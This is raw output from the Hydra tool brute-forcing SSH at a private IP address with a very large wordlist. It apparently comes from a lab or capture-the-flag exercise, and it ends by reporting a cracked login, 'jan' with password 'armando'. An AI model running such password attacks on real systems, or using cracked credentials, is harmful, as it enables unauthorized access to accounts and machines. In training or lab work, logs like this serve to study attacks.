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 v9.5 (c) 2023 by van Hauser/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).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 (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-09-22 17:29:39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[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task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[DATA] attacking ssh://10.201.125.47:22/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[STATUS] 273.00 tries/min, 273 tries in 00:01h, 14344126 to do in 875:43h, 16 active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[STATUS] 257.00 tries/min, 771 tries in 00:03h, 14343628 to do in 930:12h, 16 active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[22][ssh] host: 10.201.125.47   login: jan   password: armando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of 1 target successfully completed, 1 valid password found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 (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-09-22 17:32:46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